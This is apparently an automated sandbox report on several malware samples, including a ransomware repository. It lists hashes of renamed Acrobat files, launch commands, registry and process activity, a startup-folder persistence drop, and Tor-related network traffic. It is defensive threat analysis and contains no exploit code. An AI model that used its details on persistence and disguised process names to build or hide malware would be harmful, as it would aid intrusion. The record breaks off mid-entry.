C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun

MD5 65368c6dd915332ad36d061e55d02d6f
SHA1 fb4bc0862b192ad322fcb8215a33bd06c4077c6b
SHA256 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f
SHA512 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun

MD5 0d35b2591dc256d3575b38c748338021
SHA1 313f42a267f483e16e9dd223202c6679f243f02d
SHA256 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa
SHA512 f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun

MD5 433755fcc2552446eb1345dd28c924eb
SHA1 23863f5257bdc268015f31ab22434728e5982019
SHA256 d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b
SHA512 de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun

MD5 781ed8cdd7186821383d43d770d2e357
SHA1 99638b49b4cfec881688b025467df9f6f15371e8
SHA256 a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4
SHA512 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun

MD5 72269cd78515bde3812a44fa4c1c028c
SHA1 87cada599a01acf0a43692f07a58f62f5d90d22c
SHA256 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7
SHA512 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun

MD5 eda4add7a17cc3d53920dd85d5987a5f
SHA1 863dcc28a16e16f66f607790807299b4578e6319
SHA256 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2
SHA512 d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun

MD5 7dbb12df8a1a7faae12a7df93b48a7aa
SHA1 07800ce598bee0825598ad6f5513e2ba60d56645
SHA256 aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77
SHA512 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun

MD5 82a2e835674d50f1a9388aaf1b935002
SHA1 e09d0577da42a15ec1b71a887ff3e48cfbfeff1a
SHA256 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb
SHA512 b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun

MD5 150c9a9ed69b12d54ada958fcdbb1d8a
SHA1 804c540a51a8d14c6019d3886ece68f32f1631d5
SHA256 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43
SHA512 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun

MD5 0c680b0b1e428ebc7bff87da2553d512
SHA1 f801dedfc3796d7ec52ee8ba85f26f24bbd2627c
SHA256 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750
SHA512 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun

MD5 be26a499465cfbb09a281f34012eada0
SHA1 b8544b9f569724a863e85209f81cd952acdea561
SHA256 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5
SHA512 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun

MD5 2de4e157bf747db92c978efce8754951
SHA1 c8d31effbb9621aefac55cf3d4ecf8db5e77f53d
SHA256 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9
SHA512 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun

MD5 ad091690b979144c795c59933373ea3f
SHA1 5d9e481bc96e6f53b6ff148b0da8417f63962ada
SHA256 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1
SHA512 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun

MD5 6e333be79ea4454e2ae4a0649edc420d
SHA1 95a545127e10daea20fd38b29dcc66029bd3b8bc
SHA256 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36
SHA512 bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun

MD5 b8454390c3402747f7c5e46c69bea782
SHA1 e922c30891ff05939441d839bfe8e71ad9805ec0
SHA256 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d
SHA512 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun

MD5 3ae8789eb89621255cfd5708f5658dea
SHA1 6c3b530412474f62b91fd4393b636012c29217df
SHA256 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a
SHA512 f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun

MD5 b7c62677ce78fbd3fb9c047665223fea
SHA1 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8
SHA256 aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2
SHA512 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun

MD5 117d6f863b5406cd4f2ac4ceaa4ba2c6
SHA1 5cac25f217399ea050182d28b08301fd819f2b2e
SHA256 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362
SHA512 e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun

MD5 51da980061401d9a49494b58225b2753
SHA1 3445ffbf33f012ff638c1435f0834db9858f16d3
SHA256 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44
SHA512 ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun

MD5 2863e8df6fbbe35b81b590817dd42a04
SHA1 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c
SHA256 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad
SHA512 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun

MD5 79f6f006c95a4eb4141d6cedc7b2ebeb
SHA1 012ca3de08fb304f022f4ea9565ae465f53ab9e8
SHA256 e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e
SHA512 c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun

MD5 b88e3983f77632fa21f1d11ac7e27a64
SHA1 03a2b008cc3fe914910b0250ed4d49bd6b021393
SHA256 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5
SHA512 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun

MD5 f77086a1d20bca6ba75b8f2fef2f0247
SHA1 db7c58faaecd10e4b3473b74c1277603a75d6624
SHA256 cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d
SHA512 a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun

MD5 e03c9cd255f1d8d6c03b52fee7273894
SHA1 d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e
SHA256 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6
SHA512 d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun

MD5 62b1443d82968878c773a1414de23c82
SHA1 192bbf788c31bc7e6fe840c0ea113992a8d8621c
SHA256 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24
SHA512 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun

MD5 bca915870ae4ad0d86fcaba08a10f1fa
SHA1 7531259f5edae780e684a25635292bf4b2bb1aac
SHA256 d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037
SHA512 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun

MD5 14145467d1e7bd96f1ffe21e0ae79199
SHA1 5db5fbd88779a088fd1c4319ff26beb284ad0ff3
SHA256 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38
SHA512 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7

memory/4988-3784-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4988-3785-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4988-3786-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4988-3789-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

memory/4988-3790-0x00007FFCC04C0000-0x00007FFCC0E61000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\131.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\131.exe

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

146s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2940 -ip 2940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 1360

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240708-en

Max time kernel

120s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 04788b19797674c827ecf899fedf3cf4
SHA1 fccaf2ae2ef102a3ac143ca9c0fcf128096bc078
SHA256 84eef65370e4aaddcd9bcba38dfb783b01a15de655a4a845f51d5d12a30cdb02
SHA512 ad99c1de224ffc4a99f4914474dbc5fbc505eee2771bab379f84a6856cf12c0a39569a33eaf247b52a0b0f750d31cab9ec1182538655880a3eaf12f40745e2aa

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\assembly C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 166.120.202.116.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 165.120.202.116.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp

Files

memory/3120-0-0x00007FFC0D665000-0x00007FFC0D666000-memory.dmp

memory/3120-1-0x00007FFC0D3B0000-0x00007FFC0DD51000-memory.dmp

memory/3120-2-0x000000001B9E0000-0x000000001BEAE000-memory.dmp

memory/3120-3-0x000000001BF50000-0x000000001BFEC000-memory.dmp

memory/3120-4-0x000000001D070000-0x000000001D0D2000-memory.dmp

memory/3120-5-0x00000000027B0000-0x00000000027B8000-memory.dmp

memory/3120-6-0x000000001D4F0000-0x000000001D542000-memory.dmp

memory/3120-14-0x00007FFC0D3B0000-0x00007FFC0DD51000-memory.dmp

memory/3120-15-0x00007FFC0D665000-0x00007FFC0D666000-memory.dmp

memory/3120-16-0x00007FFC0D3B0000-0x00007FFC0DD51000-memory.dmp

memory/3120-17-0x00007FFC0D3B0000-0x00007FFC0DD51000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240903-en

Max time kernel

122s

Max time network

127s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 5ef2b469cd22ad76679c4c1449b75802
SHA1 a8e913319a1f76aad99f0e316848ea49762b7299
SHA256 d9c0dddf7a89ba13881a00f1b906ede145c6d43736e55a1666fc55ff62a3868f
SHA512 eb0a4f206c7f79473eab480c2588faa6eb877a2508e46f2db9abf71ffe697be68a4dff8683e9f66f13b196997d308b3ec158eae66c0366b19f826ba6dd85c99c

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 8587a039d49eae01b3799c8189889b9b
SHA1 0e9c23f686754f4cfaa7c94eb56ba991c811590d
SHA256 b020cc2d59a8c71d94581066fece248c56aef04502d7aa9ed81ee2fe87a9705c
SHA512 89e19688d1d04bb5abcf4e25057a6359750a4e79108ffe9be745cc379a8678d28b62f0ff2b1160281ca6df0332594b2ae3eee1dc1914e0a60fd7d80313f912d5

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
